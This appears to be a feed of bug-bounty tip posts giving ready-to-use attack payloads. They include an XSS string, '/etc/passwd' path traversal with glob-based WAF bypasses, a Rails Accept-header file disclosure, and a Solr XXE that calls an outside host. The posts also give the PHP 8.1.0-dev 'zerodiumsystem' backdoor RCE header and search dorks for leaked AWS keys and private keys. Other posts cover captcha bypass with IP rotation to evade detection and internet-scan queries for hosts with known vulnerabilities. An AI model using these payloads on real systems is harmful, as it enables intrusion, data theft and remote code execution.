🐞 Bug Bounty Tip:

If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.

#bugbountytips #tips #cybersec #bugbounty

Uncover sensitive info with: inurl:notepad.link + keyword

Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="

More cool unpublished Dorks:

http://github.com/fatguru/dorks

#bugbountytip

⚡️ XSS Payload

Payload:

1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)> 

#bugbountytips #xss #bugbounty #infosecc #cybersec

🚨 [CVE-2024-56145] Exploit released! 🚨

Details, PoC, and setup instructions:
🔗 https://github.com/Chocapikk/CVE-2024-56145

Learn more:
📖 https://assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms

#bugbountytips #BugBounty

🔖Top 25 JavaScript path files used to store sensitive information in Web Application⬇️

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js 
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js 
15. /js/policies.js
16. /js/permissions.js 
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js

#InfoSec #CyberSecurity #Hacking #BugBounty #bugbountyTools #bugbountytips #Pentest #Fuzzing

Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented

⬇️ LINK:
- https://github.com/raverrr/plution


How to use:

Basic scan, output only to screen:
cat URLs.txt | plution

Scan with a supplied payload rather than hardcoded one:

cat URLs.txt|plution -p '__proto__.zzzc=example'

Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

Output:

Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

Concurrency:

Pass the '-c' option to specify how many concurrent jobs are run (default is 5)

#infosec #cybersec #bugbountytips

⚠️ Alert ⚠️

CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution

🔗Hunter Link:hunter.how/list?searchVal…

👇 Query
HUNTER : product.name="rsync"
FOFA : product="rsync"
SHODAN : product:"rsyncd"

📰 Refer:access.redhat.com/security/cve/C…

securityonline.info/cve-2024-12084…

sysdig.com/blog/detecting…

#RSYNC#hunterhow #infosec #infosecurity #OSINT #Vulnerability

Before intercepting even a single request in burp, enable the Binary and Images filter in the proxy history. maybe it hitting up Directory Traversals catching

load_image?img=assets/imgs/logo.png with ../../../../../etc/passwd

#infosec #cybersec #bugbountytips

📮 Pentesting Bluetooth: The Practical Guide to Hacking Bluetooth Low Energy

1. https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/
2. https://pentestpartners.com/security-blog/introduction-to-bluetooth-low-energy/
3. https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy

#infosec #bluetooth

🚀 Captcha Bypass Techniques for Efficient Server Testing 🚀

Bypassing captchas can make server testing and automation easier. It's important to note that this is for testing purposes only, and the goal isn’t to compromise security, but to optimize workflows. Here are some methods to consider:

🔑 1. Parameter Manipulation

Omit Captcha Parameter: Skip the captcha parameter and try switching the HTTP method (e.g., POST → GET) or the data format (form data → JSON).
Submit Empty Captcha: Send the captcha parameter with no value.

🔍 2. Value Extraction & Reuse

Inspect Source Code: Look for captcha values hidden in the page’s source code.
Analyze Cookies: Check cookies for stored captcha values that might be reused.
Reuse Old Captcha: If a captcha was solved successfully, try using the same value. (Note: It may expire.)
Session Manipulation: Try reusing the same captcha value across different sessions or use the same session ID.

🤖 3. Automation & Recognition

Solve Math Captchas: Automate the calculation process for captchas involving simple math.
Image Recognition:
For image-based captchas, identify unique images (use MD5 hashes if limited).
Use OCR (Optical Character Recognition) tools like Tesseract to automate reading characters from images.

⚙️ 4. Additional Techniques

Rate Limit Testing: See if there are submission limits and find ways to bypass or reset them.
Use Third-Party Services: Leverage captcha-solving APIs or services.
Session & IP Rotation: Rotate your session IDs and IP addresses frequently to avoid detection.
User-Agent Manipulation: Change the User-Agent and headers to simulate different browsers or devices.
Audio Captcha Solving: Use speech-to-text services for audio captchas.

💡 Note: These techniques are meant for testing and automating workflows, not for bypassing security measures maliciously. Always ensure your actions are ethical and legal. 🔒

#bypass #Captcha #tricks #hacktricks

🚨 TP-Link Vulnerability CVE-2024-54887: Remote Code Execution 🚨

A critical vulnerability in TP-Link devices (CVE-2024-54887) has been discovered, allowing attackers to remotely execute code. This flaw could expose users to significant security risks if left unaddressed. Here’s

everything you need to know:

💡 What is CVE-2024-54887?

This vulnerability affects TP-Link routers and smart home devices, and it allows attackers to exploit a remote code execution (RCE) flaw. If exploited, an attacker can gain full control over the affected device.

⚠️ Risk of Exploitation

Remote Code Execution (RCE): Attackers can remotely run arbitrary code on the device, allowing them to gain control and potentially compromise the entire network.
Full Device Compromise: With RCE, an attacker can steal sensitive data, alter device configurations, or launch further attacks within the local network.
Impact on IoT Devices: The vulnerability affects a range of TP-Link devices, including routers and IoT products, which could be targeted for botnet attacks, espionage, or other malicious activities.

🛠 How Does the Exploit Work?

Exploiting the Vulnerability: Attackers can send specially crafted requests to the affected TP-Link devices, bypassing authentication mechanisms and executing arbitrary commands.
Exploitation via HTTP Requests: The vulnerability is triggered by manipulating HTTP requests to the vulnerable endpoint. Once triggered, it grants the attacker the ability to execute malicious commands on the device.

💥 Proof of Concept (PoC)

Exploiting the Bug: A PoC exploit has been released, demonstrating how easily this vulnerability can be triggered. It shows how an attacker can interact with a vulnerable device remotely and execute arbitrary code.
Code Execution Risk: The PoC highlights how the exploit can bypass authentication and escalate privileges, potentially leading to device takeover and exploitation.

🛡 How to Protect Yourself

Update Your Firmware:
TP-Link has released a patch to fix the vulnerability. Ensure your device is updated to the latest firmware version that addresses CVE-2024-54887.

Disable Remote Management:
Disable remote management features on your TP-Link device if you don’t need them, as this reduces the attack surface for potential exploits.

Network Segmentation:
Use network segmentation to isolate IoT devices from critical systems, making it harder for attackers to move laterally within your network.

Monitor Network Traffic:
Watch for unusual network traffic patterns, especially HTTP requests targeting your device’s IP, which may indicate exploitation attempts.

Use Strong Authentication:
Ensure strong passwords and two-factor authentication (2FA) are enabled for device access, reducing the chance of successful attacks.

📝 Key Takeaway:

The TP-Link vulnerability CVE-2024-54887 poses serious RCE risks to affected devices. Immediate patching, disabling remote management, and securing network access are critical steps to mitigate potential exploitation.

ZoomEye :

app="TP-LINK TL-WR940N WAP httpd"
6k+ results are found on ZoomEye.

ZoomEye Link: https://zoomeye.ai

Refer: https://securityonline.info/

#RCE #Cyberspacemapping #cybersecurity #ZoomEye #infosec2024

💡Injectra : A Python Tool for Seamlessly Injecting Custom Payloads into Files Using Magic Numbers

GitHub: https://github.com/AnonKryptiQuz/Injectra

If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with:

`Accept: ../../../../../../../../../../etc/passwd{{` 

#bugbountytips

If the server is deemed to be vulnerable, but a WAF is present:

`../../../../../../e*c/p*s*d{{`

🚀 HExHTTP: Advanced HTTP Header Testing Tool 🚀

HExHTTP is a Python-based tool designed to analyze HTTP headers for vulnerabilities and identify unusual behaviors in web applications. It's ideal for security researchers and penetration testers.

🌟 Features:

- Perform in-depth tests on HTTP headers.
- Detect potential vulnerabilities and security misconfigurations.
- Support for custom headers, user agents, authentication, and more.

📥 Get Started:

Check out the full details and installation
🔗 https://github.com/c0dejump/HExHTTP

#CyberSecurity #PenTesting #HTTPHeaders #HExHTTP #BugBounty #EthicalHacking #WebSecurity #PythonTools #InfoSec #VulnerabilityTesting

⚠️ Alert ⚠️

CVE-2025-21298 : Windows OLE Remote Code Execution Vulnerability

🔥PoC : https://github.com

🧐 Deep Dive : https://redcytadel.com

🔗 Hunter Link:https://hunter.how

🔍 Query

HUNTER :

product.name="Outlook Web App"

FOFA :

product="Microsoft-Outlook"

📰 Refer:https://securityonline.info

#WINDOWS #Outlook #hunterhow #infosec #infosecurity #OSINT #Vulnerability

A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example

cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.

/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."

/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d

#bugbountytips #hacking

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

🚀 Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#bugbountytips #BugBounty #payload #cybersecurity

🔍 Bystander: Passive Web Vulnerability Detection Tool 🔍

Overview: Bystander is a Chrome extension that passively monitors network requests to identify potential web vulnerabilities directly within your browser. As you browse, Bystander alerts you to any detected security issues, enhancing your web security awareness.

Key Features:

- Vulnerability Detection: Identifies actual web vulnerabilities such as Cross-Site Request Forgery (CSRF) and Clickjacking.

- Code Sink Alerts: Detects potential code injection points, including NoSQL Injection (NoSQLi), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI).

- API Token Leakage: Alerts you if API tokens are exposed during your browsing sessions.

- Personal Identifiable Information (PII) Monitoring: Notifies you of potential leaks of sensitive information like PAN numbers or hash disclosures.

- Insight Gathering: Observes and reports on staging domains, admin dashboards, and other critical elements in frontend code and network traffic.

Installation Steps:

- Download: Clone or download the Bystander repository from GitHub.

- Load Extension: In your Chromium-based browser (e.g., Chrome), navigate to Settings > Extensions and enable Developer Mode.

- Add Bystander: Click on "Load unpacked" and select the Bystander folder you downloaded.

For more detailed information and to access the source code, visit the Bystander GitHub repository:
https://github.com/itsdivyanshjain/Bystander

See an apache solr GET/POST to /select ?

Set the 'q' parameter to the following for an XXE injection:

/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'}

#infosec #cybersec #bugbountytips

If you find PHP 8.1.0-dev then try RCE & SQLi

User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id'); 

#bugbounty #bugbountytips #rce #sqli #cybersecurity